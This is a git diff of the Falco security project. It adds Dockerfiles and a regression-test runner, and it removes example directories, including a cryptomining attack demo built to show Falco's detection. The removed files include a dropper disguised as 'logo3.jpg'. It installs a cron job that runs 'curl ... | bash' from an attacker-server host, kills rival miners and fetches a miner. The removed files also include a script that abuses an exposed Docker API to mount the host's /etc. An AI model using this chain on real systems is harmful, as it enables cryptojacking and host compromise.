+ADD https://github.com/fullstorydev/grpcurl/releases/download/v1.6.0/grpcurl_1.6.0_linux_x86_64.tar.gz /
+RUN dnf install -y python-pip python docker findutils jq unzip && dnf clean all
+ENV PATH="/root/.local/bin/:${PATH}"
+RUN pip install --user avocado-framework==69.0
+RUN pip install --user avocado-framework-plugin-varianter-yaml-to-mux==69.0
+RUN pip install --user watchdog==0.10.2
+RUN pip install --user pathtools==0.1.2
+RUN tar -C /usr/bin -xvf grpcurl_1.6.0_linux_x86_64.tar.gz

 COPY ./root /

 ENTRYPOINT ["entrypoint"]
-CMD ["usage"]
+CMD ["usage"]
--- a/docker/tester/root/runners/deb.Dockerfile
+++ b/docker/tester/root/runners/deb.Dockerfile
@@ -0,0 +1,21 @@
+FROM ubuntu:18.04
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+
+ARG FALCO_VERSION=
+RUN test -n FALCO_VERSION
+ENV FALCO_VERSION ${FALCO_VERSION}
+
+RUN apt update -y
+RUN apt install dkms libyaml-0-2 -y
+
+ADD falco-${FALCO_VERSION}-x86_64.deb /
+RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb
+
+# Change the falco config within the container to enable ISO 8601 output.
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
+    && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+
+COPY rules/*.yaml /rules/
+COPY trace_files/*.scap /traces/
+
+CMD ["/usr/bin/falco"]
--- a/docker/tester/root/runners/rpm.Dockerfile
+++ b/docker/tester/root/runners/rpm.Dockerfile
@@ -0,0 +1,22 @@
+FROM centos:7
+
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+
+ARG FALCO_VERSION=
+RUN test -n FALCO_VERSION
+ENV FALCO_VERSION ${FALCO_VERSION}
+
+RUN yum update -y
+RUN yum install epel-release -y
+
+ADD falco-${FALCO_VERSION}-x86_64.rpm /
+RUN yum install -y /falco-${FALCO_VERSION}-x86_64.rpm
+
+# Change the falco config within the container to enable ISO 8601 output.
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
+    && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+
+COPY rules/*.yaml /rules/
+COPY trace_files/*.scap /traces/
+
+CMD ["/usr/bin/falco"]
--- a/docker/tester/root/runners/tar.gz.Dockerfile
+++ b/docker/tester/root/runners/tar.gz.Dockerfile
@@ -0,0 +1,21 @@
+FROM ubuntu:18.04
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+
+ARG FALCO_VERSION=
+RUN test -n FALCO_VERSION
+ENV FALCO_VERSION ${FALCO_VERSION}
+
+RUN apt update -y
+RUN apt install dkms libyaml-0-2 curl -y
+
+ADD falco-${FALCO_VERSION}-x86_64.tar.gz /
+RUN cp -R /falco-${FALCO_VERSION}-x86_64/* /
+
+# Change the falco config within the container to enable ISO 8601 output.
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
+    && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+
+COPY rules/*.yaml /rules/
+COPY trace_files/*.scap /traces/
+
+CMD ["/usr/bin/falco"]
--- a/docker/tester/root/usr/bin/entrypoint
+++ b/docker/tester/root/usr/bin/entrypoint
@@ -7,7 +7,7 @@ BUILD_DIR=/build
 CMD=${1:-test}
 shift

-# Build type can be "debug" or "release", fallbacks to "release" by default
+# build type can be "debug" or "release", fallbacks to "release" by default
 BUILD_TYPE=$(echo "$BUILD_TYPE" | tr "[:upper:]" "[:lower:]")
 case "$BUILD_TYPE" in
 "debug")
@@ -17,36 +17,64 @@ case "$BUILD_TYPE" in
    ;;
 esac

+build_image() {
+    BUILD_DIR=$1
+    BUILD_TYPE=$2
+    FALCO_VERSION=$3
+    PACKAGE_TYPE=$4
+    PACKAGE="$BUILD_DIR/$BUILD_TYPE/falco-$FALCO_VERSION-x86_64.${PACKAGE_TYPE}"
+    if [ ! -f "$PACKAGE" ]; then
+        echo "Package not found: ${PACKAGE}." >&2
+        exit 1
+    fi
+    DOCKER_IMAGE_NAME="falcosecurity/falco:test-${PACKAGE_TYPE}"
+    echo "Building local docker image $DOCKER_IMAGE_NAME from latest ${PACKAGE_TYPE} package..."
+
+    mkdir -p /runner-rootfs
+    cp "$PACKAGE" /runner-rootfs
+    cp -R "$SOURCE_DIR/falco/test/rules" /runner-rootfs
+    cp -R "$SOURCE_DIR/falco/test/trace_files" /runner-rootfs
+    docker build -f "/runners/$PACKAGE_TYPE.Dockerfile" --build-arg FALCO_VERSION="$FALCO_VERSION" -t "$DOCKER_IMAGE_NAME" /runner-rootfs
+}
+
+clean_image() {
+    PACKAGE_TYPE=$1
+    DOCKER_IMAGE_NAME="falcosecurity/falco:test-${PACKAGE_TYPE}"
+    docker rmi -f "$DOCKER_IMAGE_NAME"
+}
+
 case "$CMD" in
 "test")
-    if [ ! -d "$BUILD_DIR/$BUILD_TYPE/docker/local" ]; then
-        echo "Missing $BUILD_DIR/$BUILD_TYPE/docker/local directory." >&2
-        exit 1
+    if [ -z "$FALCO_VERSION" ]; then
+        echo "Automatically figuring out Falco version."
+        FALCO_VERSION=$("$BUILD_DIR/$BUILD_TYPE/userspace/falco/falco" --version | head -n 1 | cut -d' ' -f3 | tr -d '\r')
+        echo "Falco version: $FALCO_VERSION"
    fi
    if [ -z "$FALCO_VERSION" ]; then
-        echo "Missing Falco version." >&2
+        echo "Falco version cannot be guessed, please provide it with the FALCO_VERSION environment variable." >&2
        exit 1
    fi
-    PACKAGE="$BUILD_DIR/$BUILD_TYPE/falco-$FALCO_VERSION-x86_64.deb"
-    if [ ! -f "$PACKAGE" ]; then
-        echo "Package(s) not found." >&2
-        exit 1
-    fi
-    DOCKER_IMAGE_NAME="falcosecurity/falco:test"
-    echo "Building local docker image $DOCKER_IMAGE_NAME from latest debian package..."
-    cp "$PACKAGE" $BUILD_DIR/$BUILD_TYPE/docker/local
-    cd $BUILD_DIR/$BUILD_TYPE/docker/local
-    docker build --build-arg FALCO_VERSION="$FALCO_VERSION" -t "$DOCKER_IMAGE_NAME" .

-    # Check that source directory contains Falco and Sysdig
+    # build docker images
+    build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "deb"
+    build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "rpm"
+    build_image "$BUILD_DIR" "$BUILD_TYPE" "$FALCO_VERSION" "tar.gz"
+
+    # check that source directory contains Falco
    if [ ! -d "$SOURCE_DIR/falco/test" ]; then
        echo "Missing $SOURCE_DIR/falco/test directory." >&2
        exit 1
    fi
+
+    # run tests
    echo "Running regression tests ..."
-    cd $SOURCE_DIR/falco/test
-    bash run_regression_tests.sh $BUILD_DIR/$BUILD_TYPE
-    docker rmi "$DOCKER_IMAGE_NAME" || true
+    cd "$SOURCE_DIR/falco/test"
+    ./run_regression_tests.sh "$BUILD_DIR/$BUILD_TYPE"
+
+    # clean docker images
+    clean_image "deb"
+    clean_image "rpm"
+    clean_image "tar.gz"
    ;;
 "bash")
    CMD=/bin/bash
@@ -54,4 +82,4 @@ case "$CMD" in
 "usage")
    exec "$CMD" "$@"
    ;;
-esac
+esac
--- a/docker/tester/root/usr/bin/usage
+++ b/docker/tester/root/usr/bin/usage
@@ -3,7 +3,7 @@
 pythonversion=$(python -c 'import sys; version=sys.version_info[:3]; print("{0}.{1}.{2}".format(*version))')
 pipversion=$(pip --version | cut -d' ' -f 1,2,5,6)
 dockerversion=$(docker --version)
-avocadoversion=$(pip show avocado-framework | grep Version)
+avocadoversion=$(pip2 show avocado-framework | grep Version)
 avocadoversion=${avocadoversion#"Version: "}

 cat <<EOF
@@ -30,7 +30,7 @@ How to use.

 How to build.

-    * cd docker/builder && DOCKER_BUILDKIT=1 docker build -t falcosecurity/falco-tester .
+    * cd docker/tester && DOCKER_BUILDKIT=1 docker build -t falcosecurity/falco-tester .

 Environment.

@@ -38,4 +38,4 @@ Environment.
    * ${pipversion}
    * avocado ${avocadoversion}
    * ${dockerversion}
-EOF
+EOF
--- a/examples/bad-mount-cryptomining/README.md
+++ b/examples/bad-mount-cryptomining/README.md
@@ -1,117 +0,0 @@
-# Demo of Falco Detecting Cryptomining Exploit
-
-## Introduction
-
-Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Sysdig Falco.
-
-Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
-
-## Requirements
-
-In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
-
-## Example architecture
-
-The example consists of the following:
-
-* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
-* `attacker-server`: A nginx instance that serves the malicious files and scripts using by the attacker.
-* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
-
-All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
-
-A separate container is created to launch the attack:
-
-* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
-
-## Example Walkthrough
-
-### Start everything using docker-compose
-
-To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
-
-Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
-
-You will see fairly verbose output from dockerd:
-
-```
-host-machine_1     | crond: crond (busybox 1.27.2) started, log level 6
-host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
-host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
-host-machine_1     | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
-```
-
-When you see log output like the following, you know that falco is started and ready:
-
-```
-falco_1            | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
-falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
-falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
-```
-
-### Launch malicious container
-
-To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.
-
-The script `launch_malicious_container.sh` performs the necessary POSTs:
-
-* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
-* `http://localhost:2375/containers/create?&name=docker123321-mysql`
-* `http://localhost:2375/containers/docker123321-mysql/start`
-
-Run the script via `bash launch_malicious_container.sh`.
-
-### Examine cron output as malicious software is installed & run
-
-`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
-
-```
-* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
-```
-
-It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron/update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg))  from `attacker-server` and run it.
-
-You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
-
-```
-CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS              PORTS               NAMES
-68ed578bd034        alpine:latest       "/bin/sh -c 'echo '*…"   About a minute ago   Up About a minute                       docker123321-mysql
-```
-
-Once the cron job runs, you will see output like the following:
-
-```
-host-machine_1     | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
-host-machine_1     | ***Checking for existing Miner program
-attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
-host-machine_1     | ***Killing competing Miner programs
-host-machine_1     | ***Reinstalling cron job to run Miner program
-host-machine_1     | ***Configuring Miner program
-attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
-attacker-server_1  | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
-host-machine_1     | ***Configuring system for Miner program
-host-machine_1     | vm.nr_hugepages = 9
-host-machine_1     | ***Running Miner program
-host-machine_1     | ***Ensuring Miner program is alive
-host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
-host-machine_1     | /var/tmp
-host-machine_1     | runing.....
-host-machine_1     | ***Ensuring Miner program is alive
-host-machine_1     |   238 root       0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
-host-machine_1     | /var/tmp
-host-machine_1     | runing.....
-```
-
-### Observe Falco detecting malicious activity
-
-To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
-
-```
-falco_1            | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
-falco_1            | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
-```
-
-### Cleanup
-
-To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.
-
--- a/examples/bad-mount-cryptomining/attacker-nginx.conf
+++ b/examples/bad-mount-cryptomining/attacker-nginx.conf
@@ -1,14 +0,0 @@
-server {
-    listen       8220;
-    server_name  localhost;
-
-    location / {
-        root   /usr/share/nginx/html;
-        index  index.html index.htm;
-    }
-
-    error_page   500 502 503 504  /50x.html;
-    location = /50x.html {
-        root   /usr/share/nginx/html;
-    }
-}
--- a/examples/bad-mount-cryptomining/attacker_files/config_1.json
+++ b/examples/bad-mount-cryptomining/attacker_files/config_1.json
@@ -1 +0,0 @@
-{"config": "some-bitcoin-miner-config-goes-here"}
--- a/examples/bad-mount-cryptomining/attacker_files/logo3.jpg
+++ b/examples/bad-mount-cryptomining/attacker_files/logo3.jpg
@@ -1,64 +0,0 @@
-#!/bin/sh
-echo "***Checking for existing Miner program"
-ps -fe|grep jaav |grep -v grep
-if [ $? -eq 0 ]
-then
-pwd
-else
-
-echo "***Killing competing Miner programs"
-rm -rf /var/tmp/ysjswirmrm.conf
-rm -rf /var/tmp/sshd
-ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9
-
-echo "***Reinstalling cron job to run Miner program"
-crontab -r || true && \
-echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
-crontab /tmp/cron || true && \
-rm -rf /tmp/cron || true
-
-echo "***Configuring Miner program"
-curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
-curl -so /var/tmp/jaav http://attacker-server:8220/minerd
-chmod 777 /var/tmp/jaav
-cd /var/tmp
-
-echo "***Configuring system for Miner program"
-cd /var/tmp
-proc=`grep -c ^processor /proc/cpuinfo`
-cores=$(($proc+1))
-num=$(($cores*3))
-/sbin/sysctl -w vm.nr_hugepages=$num
-
-echo "***Running Miner program"
-nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
-fi
-
-echo "***Ensuring Miner program is alive"
-ps -fe|grep jaav |grep -v grep
-if [ $? -eq 0 ]
-then
-pwd
-else
-
-echo "***Reconfiguring Miner program"
-curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
-curl -so /var/tmp/jaav http://attacker-server:8220/minerd
-chmod 777 /var/tmp/jaav
-cd /var/tmp
-
-echo "***Reconfiguring system for Miner program"
-proc=`grep -c ^processor /proc/cpuinfo`
-cores=$(($proc+1))
-num=$(($cores*3))
-/sbin/sysctl -w vm.nr_hugepages=$num
-
-echo "***Restarting Miner program"
-nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
-fi
-echo "runing....."
--- a/examples/bad-mount-cryptomining/attacker_files/minerd
+++ b/examples/bad-mount-cryptomining/attacker_files/minerd
@@ -1,7 +0,0 @@
-#!/bin/bash
-
-while true; do
-      echo "Mining bitcoins..."
-      sleep 60
-done
-
--- a/examples/bad-mount-cryptomining/demo.yml
+++ b/examples/bad-mount-cryptomining/demo.yml
@@ -1,41 +0,0 @@
-version: '3'
-
-volumes:
-  host-filesystem:
-  docker-socket:
-
-services:
-  host-machine:
-    privileged: true
-    build:
-      context: ${PWD}/host-machine
-      dockerfile: ${PWD}/host-machine/Dockerfile
-    volumes:
-      - host-filesystem:/etc
-      - docker-socket:/var/run
-    ports:
-      - "2375:2375"
-    depends_on:
-      - "falco"
-
-  attacker-server:
-    image: nginx:latest
-    ports:
-      - "8220:8220"
-    volumes:
-      - ${PWD}/attacker_files:/usr/share/nginx/html
-      - ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf
-    depends_on:
-      - "falco"
-
-  falco:
-    image: sysdig/falco:latest
-    privileged: true
-    volumes:
-      - docker-socket:/host/var/run
-      - /dev:/host/dev
-      - /proc:/host/proc:ro
-      - /boot:/host/boot:ro
-      - /lib/modules:/host/lib/modules:ro
-      - /usr:/host/usr:ro
-    tty: true
--- a/examples/bad-mount-cryptomining/docker123321-mysql-container.json
+++ b/examples/bad-mount-cryptomining/docker123321-mysql-container.json
@@ -1,7 +0,0 @@
-{
-    "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
-    "Image": "alpine:latest",
-    "HostConfig": {
-	"Binds": ["/etc:/mnt/etc"]
-    }
-}
--- a/examples/bad-mount-cryptomining/host-machine/Dockerfile
+++ b/examples/bad-mount-cryptomining/host-machine/Dockerfile
@@ -1,12 +0,0 @@
-FROM docker:stable-dind
-
-RUN set -ex \
-    && apk add --no-cache \
-    bash curl
-
-COPY start-cron-and-dind.sh /usr/local/bin
-
-ENTRYPOINT ["start-cron-and-dind.sh"]
-CMD []
-
-
--- a/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh
+++ b/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh
@@ -1,11 +0,0 @@
-#!/bin/sh
-
-# Start docker-in-docker, but backgrounded with its output still going
-# to stdout/stderr.
-dockerd-entrypoint.sh &
-
-# Start cron in the foreground with a moderate level of debugging to
-# see job output.
-crond -f -d 6
-
-
--- a/examples/bad-mount-cryptomining/launch_malicious_container.sh
+++ b/examples/bad-mount-cryptomining/launch_malicious_container.sh
@@ -1,14 +0,0 @@
-#!/bin/sh
-
-echo "Pulling alpine:latest image to docker-in-docker instance"
-curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
-
-echo "Creating container mounting /etc from host-machine"
-curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
-
-echo "Running container mounting /etc from host-machine"
-curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'
-
-
-
-
--- a/examples/k8s_audit_config/README.md
+++ b/examples/k8s_audit_config/README.md
@@ -1,136 +0,0 @@
-This page describes how to get [Kubernetes Auditing](https://kubernetes.io/docs/tasks/debug-application-cluster/audit) working with Falco.
-Either using static audit backends in Kubernetes 1.11, or in Kubernetes 1.13 with dynamic sink which configures webhook backends through an AuditSink API object.
-
-<!-- toc -->
-
- [Instructions for Kubernetes 1.11](#instructions-for-kubernetes-111)
-  * [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster)
-  * [Define your audit policy and webhook configuration](#define-your-audit-policy-and-webhook-configuration)
-  * [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging)
-  * [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco)
- [Instructions for Kubernetes 1.13](#instructions-for-kubernetes-113)
-  * [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster-1)
-  * [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging-1)
-  * [Deploy AuditSink objects](#deploy-auditsink-objects)
-  * [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco-1)
- [Instructions for Kubernetes 1.13 with dynamic webhook and local log file](#instructions-for-kubernetes-113-with-dynamic-webhook-and-local-log-file)
-
-<!-- tocstop -->
-
-## Instructions for Kubernetes 1.11
-
-The main steps are:
-
-1. Deploy Falco to your Kubernetes cluster
-1. Define your audit policy and webhook configuration
-1. Restart the API Server to enable Audit Logging
-1. Observe Kubernetes audit events at falco
-
-### Deploy Falco to your Kubernetes cluster
-
-Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a falco service account, service, configmap, and daemonset.
-
-### Define your audit policy and webhook configuration
-
-The files in this directory can be used to configure Kubernetes audit logging. The relevant files are:
-
-* [audit-policy.yaml](./audit-policy.yaml): The Kubernetes audit log configuration we used to create the rules in [k8s_audit_rules.yaml](../../rules/k8s_audit_rules.yaml).
-* [webhook-config.yaml.in](./webhook-config.yaml.in): A (templated) webhook configuration that sends audit events to an ip associated with the falco service, port 8765. It is templated in that the *actual* IP is defined in an environment variable `FALCO_SERVICE_CLUSTERIP`, which can be plugged in using a program like `envsubst`.
-
-Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the `ClusterIP`s associated with those services are routable.
-
-```
-FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < webhook-config.yaml.in > webhook-config.yaml
-```
-
-### Restart the API Server to enable Audit Logging
-
-A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling audit log support for the apiserver, including copying the audit policy/webhook files to the apiserver machine, modifying the apiserver command line to add `--audit-log-path`, `--audit-policy-file`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
-
-It is run as `bash ./enable-k8s-audit.sh <variant> static`. `<variant>` can be one of the following:
-
-* `minikube`
-* `kops`
-
-When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
-
-Its output looks like this:
-
-```
-$ bash enable-k8s-audit.sh minikube static
-***Copying apiserver config patch script to apiserver...
-apiserver-config.patch.sh                                                                   100% 1190     1.2MB/s   00:00
-***Copying audit policy/webhook files to apiserver...
-audit-policy.yaml                                                                           100% 2519     1.2MB/s   00:00
-webhook-config.yaml                                                                         100%  248   362.0KB/s   00:00
-***Modifying k8s apiserver config (will result in apiserver restarting)...
-***Done!
-$
-```
-### Observe Kubernetes audit events at falco
-
-Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
-
-## Instructions for Kubernetes 1.13
-
-The main steps are:
-
-1. Deploy Falco to your Kubernetes cluster
-2. Restart the API Server to enable Audit Logging
-3. Deploy the AuditSink object for your audit policy and webhook configuration
-4. Observe Kubernetes audit events at falco
-
-### Deploy Falco to your Kubernetes cluster
-
-Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a Falco service account, service, configmap, and daemonset.
-
-### Restart the API Server to enable Audit Logging
-
-A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling dynamic audit support for the apiserver by modifying the apiserver command line to add `--audit-dynamic-configuration`, `--feature-gates=DynamicAuditing=true`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
-
-It is run as `bash ./enable-k8s-audit.sh <variant> dynamic`. `<variant>` can be one of the following:
-
-* `minikube`
-* `kops`
-
-When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
-
-Its output looks like this:
-
-```
-$ bash enable-k8s-audit.sh minikube dynamic
-***Copying apiserver config patch script to apiserver...
-apiserver-config.patch.sh                                                                   100% 1190     1.2MB/s   00:00
-***Modifying k8s apiserver config (will result in apiserver restarting)...
-***Done!
-$
-```
-
-### Deploy AuditSink objects
-
-[audit-sink.yaml.in](./audit-sink.yaml.in), in this directory, is a template audit sink configuration that defines the dynamic audit policy and webhook to route Kubernetes audit events to Falco.
-
-Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the ClusterIPs associated with those services are routable.
-
-```
-FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < audit-sink.yaml.in > audit-sink.yaml
-```
-
-### Observe Kubernetes audit events at falco
-
-Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
-
-## Instructions for Kubernetes 1.13 with dynamic webhook and local log file
-
-If you want to use a mix of `AuditSink` for remote audit events as well as a local audit log file, you can run `enable-k8s-audit.sh` with the `"dynamic+log"` argument e.g. `bash ./enable-k8s-audit.sh <variant> dynamic+log`. This will enable dynamic audit logs as well as a static audit log to a local file. Its output looks like this:
-
-```
-***Copying apiserver config patch script to apiserver...
-apiserver-config.patch.sh                                                                          100% 2211   662.9KB/s   00:00
-***Copying audit policy file to apiserver...
-audit-policy.yaml                                                                                  100% 2519   847.7KB/s   00:00
-***Modifying k8s apiserver config (will result in apiserver restarting)...
-***Done!
-```
-
-The audit log will be available on the apiserver host at `/var/lib/k8s_audit/audit.log`.
--- a/examples/k8s_audit_config/apiserver-config.patch.sh
+++ b/examples/k8s_audit_config/apiserver-config.patch.sh
@@ -1,72 +0,0 @@
-#!/usr/bin/env bash
-
-set -euo pipefail
-
-IFS=''
-
-FILENAME=${1:-/etc/kubernetes/manifests/kube-apiserver.yaml}
-VARIANT=${2:-minikube}
-AUDIT_TYPE=${3:-static}
-
-if [ "$AUDIT_TYPE" == "static" ]; then
-    if grep audit-webhook-config-file "$FILENAME" ; then
-	echo audit-webhook patch already applied
-	exit 0
-    fi
-else
-    if grep audit-dynamic-configuration "$FILENAME" ; then
-	echo audit-dynamic-configuration patch already applied
-	exit 0
-    fi
-fi
-
-TMPFILE="/tmp/kube-apiserver.yaml.patched"
-rm -f "$TMPFILE"
-
-APISERVER_PREFIX="    -"
-APISERVER_LINE="- kube-apiserver"
-
-if [ "$VARIANT" == "kops" ]; then
-    APISERVER_PREFIX="     "
-    APISERVER_LINE="/usr/local/bin/kube-apiserver"
-fi
-
-while read -r LINE
-do
-    echo "$LINE" >> "$TMPFILE"
-    case "$LINE" in
-        *$APISERVER_LINE*)
-	    if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
-		echo "$APISERVER_PREFIX --audit-log-path=/var/lib/k8s_audit/audit.log" >> "$TMPFILE"
-		echo "$APISERVER_PREFIX --audit-policy-file=/var/lib/k8s_audit/audit-policy.yaml" >> "$TMPFILE"
-		if [[ $AUDIT_TYPE == "static" ]]; then
-		    echo "$APISERVER_PREFIX --audit-webhook-config-file=/var/lib/k8s_audit/webhook-config.yaml" >> "$TMPFILE"
-		    echo "$APISERVER_PREFIX --audit-webhook-batch-max-wait=5s" >> "$TMPFILE"
-		fi
-	    fi
-	    if [[ ($AUDIT_TYPE == "dynamic" || $AUDIT_TYPE == "dynamic+log") ]]; then
-		echo "$APISERVER_PREFIX --audit-dynamic-configuration" >> "$TMPFILE"
-		echo "$APISERVER_PREFIX --feature-gates=DynamicAuditing=true" >> "$TMPFILE"
-		echo "$APISERVER_PREFIX --runtime-config=auditregistration.k8s.io/v1alpha1=true" >> "$TMPFILE"
-	    fi
-            ;;
-        *"volumeMounts:"*)
-	    if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
